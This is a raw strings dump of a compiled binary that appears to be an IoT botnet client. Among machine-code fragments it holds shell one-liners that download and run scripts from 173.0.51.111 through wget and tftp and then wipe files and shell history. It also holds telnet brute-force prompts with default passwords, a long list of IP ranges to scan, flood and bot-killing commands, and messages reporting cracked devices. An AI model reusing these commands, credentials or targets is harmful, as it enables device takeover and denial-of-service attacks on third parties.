N^NuNV
f>"y
N^NuNV
N^NuNV
N^NuNV
N^Nu
 OHWHQHy
x @B
vHp;F
HxT!/.
df .
NqNV
,NqNV
N^NuNV
UUUV 
N^NuNV
N^NuNV
zpoF
_S9)"
N^NuNV
`J$.
N^NuNV
N^NuNV
`  .
N^NuNV
 P .
N^NuNV
p -@
p0-@
`" n
N^NuNV
`L .
N^NuNV
`4 .
sfL".
df:".
xf8".
Xf8".
uf6".
`d n
cfX".
N^NuNV
N^NuNV
N^NuNV
N^NuNV
: @ 
rf: .
g  .
`4 .
N^NuNV
N^NuNV
`$ .
 @N^NuNV
`. .
N^NuNV
g(p?
g* n
`d n
N^NuNV
N^NuNV
`$ n
N^NuNV
`N .
N^NuNV
 @$6
 @$6
`R 9
LN^NuNV
`V n
g. .
N^NuNV
 @$6
L`FB
L`@B
L`:B
HN^NuNV
`& .
N^NuNV
`j n
`T n
f$ n
`" n
N^NuNV
of .
N^NuNV
N^NuNV
N^NuNV
N^NuNV
`: 9
`" 9
N^NuNV
N^NuNV
`6 n
o` n
`0$.
B@HAH@(
B@HAH@
<N^NuNV
p -@
"H @ 
N^NuNV
N^NuNV
N^NuNV
 @N^NuNV
N^NuNV
 @$6
hN^NuNV
N^NuNV
N^NuNV
`, .
N^NuNV
0 -|
`l n
f*$.
"@ n
"@ n
f" .
f" .
"@ n
gB .
"@$6
g\ .
BP .
f\ .
	^ .
"P .
/	Hx'
gh .
l< .
l< .
"P .
/	Hx'
gh .
l< .
l< .
"P .
/	Hx'
"@ n
"@$9
l< .
"@ n
"@$9
l\ .
c8 .
NqNV
`l n
f*$.
"@ n
Z"@ n
"@ n
gB .
"@$6
g\ .
BP .
f\ .
"P .
/	Hx'
gh .
l< .
"P .
/	Hx'
gh .
l< .
"P .
/	Hx'
"@ n
l< .
"P .
/	Hx'
gh .
l< .
"@ n
"@$9
l\ .
c8 .
 NqNV
p2-@
N^NuNV
f^ n
`v .
Tacocat
`L .
`" .
N^NuNV
f./9
f$ 9
f< 9
f@ 9
fP 9
f@ 9
	l0|
	P0|
	20|
gn .
f*/.
"@ n
"@ n
gb .
g\ .
gr .
f./.
`` .
gD .
g& .
`N^NuNV
N^NuNV
``Hy
`"".
N^NuNV
 @N^NuNV
`. .
`& .
B6	 
`$ n
gn$.
>NqNu"_ <
N@"<
NuNV
 A-P
`V-n
p7N@-@
N^NuNV
N@-@
N^NuNV
 A-P
N^NuNuNV
N@-@
N^NuNV
NqNV
p!N@-@
N^NuNV
N@-@
N^NuNV
N^NuNuNV
N@-@
N^NuNV
p?N@-@
N^NuNV
N@-@
N^NuNV
N^NuNV
N@-@
N^NuNV
N@-@
N^NuNV
N@-@
N^NuNuNV
 A-P
"	p6N@-@
N^NuNuNV
p%N@-@
N^NuNV
N^NuNV
N@-@
N^NuNV
 A-P
N^NuNV
N^NuNV
p*N@-@
N^NuNuNV
<0&n
N@-@
N^NuNuNV
0 $n
N@-@
N^NuNV
<8&n
N@-@
N^NuNV
pBN@-@
N^NuNV
`h-n
N@-@
N^NuNV
N@-@
N^NuNuNV
N^NuNuNV
0 $n
N@-@
N^NuNV
N^NuNV
0@-H
N^NuNV
@ @N^NuNV
f40|
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNV
gH n
`, n
N^NuNV
g, n
N^NuNV
N^NuNV
gV .
o0 .
`<-n
o  .
N^NuNV
o( n
f> n
pW-@
f, n
p,-@
e* n
p7-@
dZ n
-f "n
`. n
gd n
p	-@
f. .
b$ n
0f:p
fn .
fV .
 @-P
>g6 n
`|-|
`D n
f. .
`<".
N^NuNV
lB .
g& .
gh .
o*".
gl n
%gLR
<`"-n
0N^NuNV
p	-@
`P n
%f@R
%g0 n
`$ n
N^NuNV
oH n
N^NuNV
f(0|
f(0|
`v0|
`Z0|
`:2|
`| n
f. n
f. n
lD n
p  n
$_N^NuNuNV
N^NuNV
`,/.
N^NuNV
n  .
$f2J
oF-n
0fp-n
*fZJ
g4 n
f -n
p0-@
r -A
f* n
m,".
F`4 n
N^NuNuNV
c2"n
gV .
fJ/.
g: n
`: .
N^NuNV
N^NuNV
e, .
N^NuNuNV
`R n
`& n
N^NuNV
`H n
N^NuNV
 @N^NuNuNV
H@B@
`l n
 @N^NuNuNV
`, n
H@B@
f* .
`` n
`8 n
N^NuNuNV
N^NuNuNV
N^NuNV
`  n
`f n
`D n
`" n
N^NuNV
gh n
gJ n
g, n
fL-n
`J n
` J.
N^NuNV
`0 n
f"".
`~ n
g\ .
gT .
g>".
g( .
N^NuNuNV
gr`FJ
 @N^NuNV
 @N^NuNV
e2-|
`F".
p"-@
g& .
N^NuNV
N^NuNuNV
`t n
g6 n
 @$.
N^NuNuNV
1P/.
 @N^NuNV
N^NuNV
gn .
N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
 @N^NuNV
N^NuNV
`b".
 @N^NuNV
1T/.
 @N^NuNuNV
N^NuNV
1dHy
30/.
 @N^NuNV
g$ .
t"-B
t"-B
r"-A
p"-@
p"-@
gH n
KN <
c. .
p"-@
`$ .
fl .
N^NuNV
N^NuNV
N^NuNuNV
N^NuNuNV
N^NuNV
N^NuNV
N^NuNuNV
N^NuNV
N^NuNuNV
N^NuNuNV
God A red nugget A fat egg under a dog
N^NuNV
lp -@
`^/.
 @N^NuNuNV
N^NuNV
N^NuNV
N^NuNV
b""9
3h .
g4 .
gF/.
 @$.
N^NuNV
f>Hy
3DHy
 @N^NuNuNV
N^NuNV
 @-P
`j/.
f* 9
N^NuNV
3DHy
N^NuNuNV
N^NuNV
N^NuNV
`J n
e4".
 @$.
N^NuNV
N^NuNV
N^NuNV
 @N^NuNV
`t n
g>".
f& n
`& .
`"/.
 @$.
N^NuNV
N^NuNuNV
N^NuNV
 @N^NuNV
 @N^NuNV
N^NuNV
`*"n
fffg"
gR n
fffg$
N^NuNV
f: n
N^NuNV
N^NuNV
g*"n
N^NuNV
l:/.
N^NuNuNV
N^NuNV
N^NuNuNV
0f*R
`2 n
.p" 
N^NuNuNV
3\/.
"NqNV
N^NuNuNV
p -@
(r -A
g. .
HN^NuNuNV
N^NuNV
N^NuNV
N^NuNV
N^NuNV
f&/.
N^NuNV
f8 9
3h <
N^NuNV
3p .
3d n
3dHx
3d-@
`>-n
e( n
3h .
f" .
gF".
g./<
3l"<
NqNuNV
"	pfN@-@
N^NuNuNV
0 $n
N@-@
N^NuNV
N@-@
N^NuNV
N@-@
N^NuNV
N@-@
N^NuNV
N@-@
N^NuNuNV
`,-y
 @N^NuNuNV
< $n
"	prN@-@
N^NuNV
N^NuNV
0@-H
N^NuNV
D @N^NuNV
N^NuNV
N^NuNuNV
`L n
*pT 
`T n
N^NuNuNV
N^NuNV
g| .
N^NuNuNV
fh n
gx .
g: .
`D n
N^NuNuNV
f. n
f, n
fj n
g@ n
N^NuNuNV
mp .
`h .
`F n
0@-H
N^NuNuNV
N^NuNV
`$".
N^NuNuNV
`J n
p !@
tp-B
r	-A
gl .
`h .
`2 .
f8$.
o(Hx
m& .
mL n
oP n
o  n
o& n
l, n
g$ n
gF$.
l4 .
fffg"
fffg$
ov n
g* n
`< n
"P n
`" n
N^NuNuNV
f0p8
N^NuNuNV
H@B@
gn .
`r n
`X n
 @N^NuNV
`~ n
`@ n
N^NuNV
`b n
N^NuNV
 @N^NuNV
 @N^NuNuNV
H@B@
gj-n
`l n
`R n
N^NuNuNV
`R-n
 @N^NuNuNV
`2-n
 @N^NuNuNV
`> .
`| n
`> .
N^NuNuNV
mH 9
o<Hx
4D 0
:` Hx
gb <
` /.
g  n
fj n
g` <
`" .
gZ <
N^NuNV
g( n
g@ n
g4 n
`:$9
4` .
gX .
`< 9
4d 9
4D 0
`:$9
4d .
HN^NuNV
$N^NuNuNV
gB n
mB .
N^NuNV
p -@
f4Hx
f6 9
f~ 9
p -@
NqNuNV
4h0|
4lN^NuNV
p-N@-@
N^NuNV
80&n
N@-@
N^NuNuNV
N@-@
N^NuNV
f40|
N^NuNV
 @N^NuNuNV
N^NuNV
f40|
md n
N^NuNuNV
gv n
N^NuNV
rgd-|
wgP-|
ag<a
g$ n
fDHx
ml n
u~-P
fZHx
g( n
 @$.
N^NuNV
N^NuNuNV
f40|
 @N^NuNuNV
`p n
N^NuNV
g40|
f8/.
f" n
(`N n
g8/.
f" n
N^NuNV
c4"n
f``R/.
fH`. .
 @N^NuNuNV
H@B@
`N n
`4 n
 @N^NuNuNV
`* n
 @N^NuNuNV
`@-n
N^NuNV
 @N^NuNV
lnr9
mf n
`2p.
`L n
N^NuNV
g: .
fv-n
`8p.
f( .
g6 .
gh".
`0 .
N^NuNV
`, .
`& .
N^NuNV
B@H@
0fb"n
B@H@
B@H@
0fTS
`N"n
B@H@
B@H@
B@H@
 @$.
N^NuNV
`J".
"@ .
`f .
f$ .
`> .
`2 .
g( .
g" .
g6 .
n, .
fn .
ff .
fR .
fF .
`0 .
 @N^NuNV
g `< .
`, .
 @N^NuNuNV
N^NuNuNV
N^NuNV
`l n
N^NuNuNV
N^NuNV
H@B@
N^NuNV
 @N^NuNV
Beeb
g$ .
p"-@
p"-@
p"-@
p"-@
p"-@
p"-@
r"-A
Z`-P
g( n
g( n
N`Br
`$ .
fz n
o\ n
fx n
oZ n
N^NuNV
N^NuNV
<0&n
N@-@
N^NuNV
N^NuNuNV
c& n
g: n
S@ n
g& n
gT n
gb n
`4Hx
N^NuNV
g@ n
N^NuNV
N^NuNV
f8J.
N^NuNV
`Rp?F
`0 .
N^NuNuNV
fd .
N^NuNuNV
N^NuNuNV
f. n
f, n
P,p	 
`Z n
g0/.
N^NuNuNV
N^NuNV
N^NuNuNV
N^Nu173.0.51.111
cd /tmp; wget http://173.0.51.111/SSF5 -O phone; chmod 777 phone; ./phone;wget http://173.0.51.111/SSF11 -O sshd; chmod 777 sshd; ./sshd; rm -rf phone sshd
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://173.0.51.111/SSF.sh; chmod 777 SSF.sh; sh SSF.sh; tftp 173.0.51.111 -c get tftp11.sh; chmod 777 tftp11.sh; sh tftp11.sh; tftp -r tftp22.sh -g 173.0.51.111; chmod 777 tftp22.sh; sh tftp22.sh; rm -rf SSF.sh tftp11.sh tftp22.sh; rm -rf *;history -c
cd /tmp;rm -rf SSF*; busybox wget http://173.0.51.111/SSF.sh; chmod 777 SSF.sh; sh SSF.sh;busybox tftp 173.0.51.111 -c get tftp11.sh; chmod 777 tftp11.sh; sh tftp11.sh;busybox tftp -r tftp22.sh -g 173.0.51.111; chmod 777 tftp22.sh; sh tftp22.sh; rm -rf SSF.sh tftp11.sh tftp22.sh; rm -rf SSF*
telnet
root
BusyBox
Linux
ogin
sername
assword
9615-cdp
nvalid
ailed
ncorrect
enied
rror
oodbye
ailure
mdm9625
/dev/netslink/
/tmp/
/var/
/dev/
/var/run/
/dev/shm/
/mnt/
/boot/
/usr/
Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)
Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10
Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0
Opera/6.04 (Windows XP; U) [en]
Opera/9.99 (X11; U; sk)
Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc
Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk
Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41
Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)
Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15
AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)
AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)
AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)
AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)
AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)
AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)
AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)
AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)
AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)
magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)
Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)
nwonknu
unknown
hello
slammed
Machines
Dank
Layer4
hhfdhkhbhcace
flood
ugiydg
IOHEDU9S
SIAHDIYSGBILC
DSFDD
DVAS
EFFAESF
uhdusaibxi
OIEDNBOUBAS
WQIJOIWENASO
pkpinasoubc
wubihbdc
inopxuob
wubiddsd
savduhvaU
UHyig732vgux
UByovoouds
saybuyyyywugav
sdjbciysvhdaocu
dsibciwveas
dsygc8y32723
tydjtr
tfkyt
rsyreg
HCKG
uibeiubf
YRXDJR
YIFUKT
YCJYRX
7TUFF
dsgdf
idsh
gffag
gfdag
fgadf
fbafdb
fbbbf
dfbdfb
fdbxb
BEDROLL
BEDSORE
BEETLED
BEETLES
BEHESTS
BEHOLDS
BENDERS
DELETES
DEBTORS
DUSTERS
ENSURED
EYELESS
EYELETS
HOLSTER
HUNTERS
LENDERS
HOTBEDS
LUSHEST
sudo
http
request
socket
create
Merry
holidays
vdeubhs
G8WGVSI
VUSAVXU
28H9UgBGvv
IYVkhj
uiVU
super
user
26736
18h3b2
kekd
wrecked
Unix
Strings
Manipulation
Command
Line
edew
apt-get
ewdb
ubed
iyvugvjvkh
HBiug655
KJYDFyljf754
hbjhvihk
guygiuov
ugyi
iyfutvugjiu
hbivutfyrfvg
uivyuivug
khvihvgiug
jbihvbig
ubihkbvihyvigv
bivhkb
vejvbboqi
vobqre
odupubw
ftyduiy
hbilyfutdi
78tgyuhkbjg
tudiryxcvi
iygcduy
RTRTWFNJ
ghdugffytsdyt
tgerthgwtrwry
yteytietyue
qsortEQS
8969876hjkghblk
6mD4Q
Ck0Zt
6T1bg
joNuc
v9SNj
Fm74C
pXVcb
w472Y
vn6PH
Ycy7z
EraqpCtc
eQE9VqOO
0I2tFegb
c9vSbX37
HzullcDD
sQT6GUpo
SE5iiTRL
8YnpVkqQ
P4ZFrN8y
ZaygGQWy
4b9hcI2E0ob
NbOwbHGP1sv
Hot98t9cA1C
SmosSnBu3UI
6LhO2mqIaG2
wFKTDkBE12q
wr5RiFwx0oe
bKJDMfvjRK2
CXaCtbYiETK
HRvlWcOcb8v
SozDWxWE2jAWgGv
LO53SCJbVwKjAta
M6qlcepTThrOhl3
s4VIALs5l0Murlt
eHj9MDyMU2PoJ32
aLQP6OWncMD8Pq7
1zoihgOpu92HLUz
wZU4i9GsFjT3DXt
8SqliubwCJDq9fg
NBLlKNISq52KJNr
uewbdih
wqodbpdwdqw
iqhdpuqhwb
close
keep-alive
accept
%s %s HTTP/1.1
Connection: %s
Accept: */*
User-Agent: %s
ping %s -s %s -i %s -w %s
busybox
armv6
A Santa lives evil at NASA
armv4
mips
mipsel
cock
fucknet
swatnet
botnet
dicknet
cracknet
weednet
ballnet
queernet
unet
yougay
gaynet
armv5l
armv6l
tftp
buff
i686
mips64
jackmeoff
sexy
briankrebs
sparc
powerpc-440fp
cunt
shit
tkill -9 $(pidof %s)
kill -9 $(pidof busybox
history -c
kill -9 %s
(null)
/bin/sh
PING
gethostbyname
:>%$#
112.5.%d.%d
117.165.%d.%d
85.3.%d.%d
41.252.%d.%d
104.55.%d.%d
78.186.%d.%d
78.189.%d.%d
221.120.%d.%d
88.5.%d.%d
41.254.%d.%d
103.20.%d.%d
103.47.%d.%d
103.57.%d.%d
45.117.%d.%d
101.51.%d.%d
137.59.%d.%d
14.204.%d.%d
27.50.%d.%d
27.54.%d.%d
27.98.%d.%d
36.32.%d.%d
36.248.%d.%d
39.64.%d.%d
43.253.%d.%d
43.230.%d.%d
163.53.%d.%d
43.245.%d.%d
123.25.%d.%d
103.54.%d.%d
27.255.%d.%d
103.204.%d.%d
123.24.%d.%d
113.191.%d.%d
113.188.%d.%d
113.189.%d.%d
14.160.%d.%d
14.161.%d.%d
14.162.%d.%d
14.163.%d.%d
14.164.%d.%d
14.165.%d.%d
14.166.%d.%d
14.167.%d.%d
14.168.%d.%d
14.169.%d.%d
14.170.%d.%d
14.171.%d.%d
14.172.%d.%d
14.173.%d.%d
14.174.%d.%d
14.175.%d.%d
14.176.%d.%d
14.177.%d.%d
14.178.%d.%d
14.179.%d.%d
14.180.%d.%d
14.181.%d.%d
14.182.%d.%d
14.183.%d.%d
14.184.%d.%d
14.185.%d.%d
14.186.%d.%d
14.187.%d.%d
14.188.%d.%d
14.189.%d.%d
14.190.%d.%d
14.191.%d.%d
45.121.%d.%d
45.120.%d.%d
45.115.%d.%d
43.252.%d.%d
43.240.%d.%d
41.174.%d.%d
45.127.%d.%d
103.30.%d.%d
123.16.%d.%d
202.44.%d.%d
116.93.%d.%d
41.253.%d.%d
117.173.%d.%d
113.190.%d.%d
112.196.%d.%d
113.178.%d.%d
112.45.%d.%d
183.223.%d.%d
116.71.%d.%d
103.44.%d.%d
110.235.%d.%d
124.253.%d.%d
211.237.%d.%d
117.175.%d.%d
111.9.%d.%d
222.252.%d.%d
113.174.%d.%d
113.160.%d.%d
113.161.%d.%d
113.162.%d.%d
113.163.%d.%d
113.164.%d.%d
113.165.%d.%d
113.166.%d.%d
113.167.%d.%d
113.168.%d.%d
113.169.%d.%d
123.17.%d.%d
123.21.%d.%d
123.22.%d.%d
222.253.%d.%d
222.254.%d.%d
222.255.%d.%d
41.208.%d.%d
103.198.%d.%d
88.248.%d.%d
88.105.%d.%d
88.247.%d.%d
85.105.%d.%d
188.3.%d.%d
103.203.%d.%d
103.55.%d.%d
103.220.%d.%d
183.233.%d.%d
103.242.%d.%d
103.14.%d.%d
103.195.%d.%d
103.214.%d.%d
103.218.%d.%d
103.225.%d.%d
103.228.%d.%d
103.231.%d.%d
103.60.%d.%d
103.248.%d.%d
103.253.%d.%d
103.255.%d.%d
113.176.%d.%d
113.175.%d.%d
203.134.%d.%d
203.210.%d.%d
117.176.%d.%d
117.171.%d.%d
117.162.%d.%d
203.150.%d.%d
119.157.%d.%d
119.150.%d.%d
119.151.%d.%d
119.152.%d.%d
119.153.%d.%d
119.154.%d.%d
119.155.%d.%d
119.156.%d.%d
119.158.%d.%d
119.159.%d.%d
191.24.%d.%d
187.119.%d.%d
177.215.%d.%d
152.241.%d.%d
182.185.%d.%d
179.80.%d.%d
179.81.%d.%d
179.82.%d.%d
179.83.%d.%d
179.84.%d.%d
179.86.%d.%d
179.87.%d.%d
179.88.%d.%d
179.89.%d.%d
179.90.%d.%d
179.91.%d.%d
179.92.%d.%d
179.93.%d.%d
179.94.%d.%d
179.95.%d.%d
179.96.%d.%d
179.97.%d.%d
179.98.%d.%d
179.99.%d.%d
152.240.%d.%d
152.242.%d.%d
152.243.%d.%d
152.244.%d.%d
152.245.%d.%d
152.246.%d.%d
152.247.%d.%d
152.248.%d.%d
152.249.%d.%d
182.189.%d.%d
182.190.%d.%d
182.191.%d.%d
182.188.%d.%d
182.187.%d.%d
182.186.%d.%d
182.184.%d.%d
179.100.%d.%d
179.101.%d.%d
179.102.%d.%d
179.103.%d.%d
179.110.%d.%d
179.111.%d.%d
179.112.%d.%d
179.113.%d.%d
179.114.%d.%d
179.115.%d.%d
179.116.%d.%d
179.117.%d.%d
191.193.%d.%d
191.194.%d.%d
191.195.%d.%d
191.196.%d.%d
191.197.%d.%d
191.198.%d.%d
152.250.%d.%d
152.251.%d.%d
152.252.%d.%d
152.253.%d.%d
152.254.%d.%d
152.255.%d.%d
177.112.%d.%d
177.113.%d.%d
177.114.%d.%d
177.115.%d.%d
177.116.%d.%d
177.117.%d.%d
177.118.%d.%d
177.119.%d.%d
177.120.%d.%d
177.121.%d.%d
177.138.%d.%d
177.139.%d.%d
177.144.%d.%d
177.145.%d.%d
177.146.%d.%d
177.147.%d.%d
177.160.%d.%d
Borrow or rob
177.161.%d.%d
177.162.%d.%d
177.163.%d.%d
Degas are we not drawn onward no In union drawn onward to new eras aged
177.168.%d.%d
177.169.%d.%d
177.170.%d.%d
177.171.%d.%d
177.172.%d.%d
189.96.%d.%d
189.97.%d.%d
189.98.%d.%d
189.99.%d.%d
39.34.%d.%d
59.103.%d.%d
191.12.%d.%d
186.117.%d.%d
179.131.%d.%d
179.129.%d.%d
179.170.%d.%d
191.206.%d.%d
187.118.%d.%d
187.116.%d.%d
179.224.%d.%d
179.166.%d.%d
%d.%d.%d.%d
[36mDevice Cracked 
[32m-> 
[37m%s | 
[36mUsername 
[32m-> 
[37m%s | 
[36mPassword 
[32m-> 
[37m%s
admin
[31mPhone Cracked 
[32m-> 
[37m%s | 
[31mUsername 
[32m-> 
[37madmin | 
[31mPassword 
[32m-> 
[37madmin
oelinux123
PONG!
GETLOCALIP
My IP: %s
BOTKILL
Killing Bots
SCANNER
SCANNER ON | OFF
 OFF
PHONE
PHONE ON | OFF
PHONE SCANNER OFF:%s
ICMP
HTTP
RANGE
RANGE <option 0-idk>
Range %d->%d
STOP
HOODASSSHIT
8.8.8.8
/proc/net/route
	00000000	
/usr/bin/python
SERVER
ROUTER
sshd
/usr/sbin/dropbear
[32mDEVICE CONNECTED 
[31m-> 
[37m%s | 
[32mTYPE 
[31m-> 
[37m%s
PONG
MOVE
%s 2>&1
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
%s%s%s
Error 0
Unknown host
Host name lookup failure
Unknown server error
No address associated with name
Resolver error
/bin/sh
/dev/null
/etc/resolv.conf
/etc/config/resolv.conf
nameserver
domain
search
0123456789abcdef
/etc/hosts
/etc/config/hosts
S[kA
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
alula
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
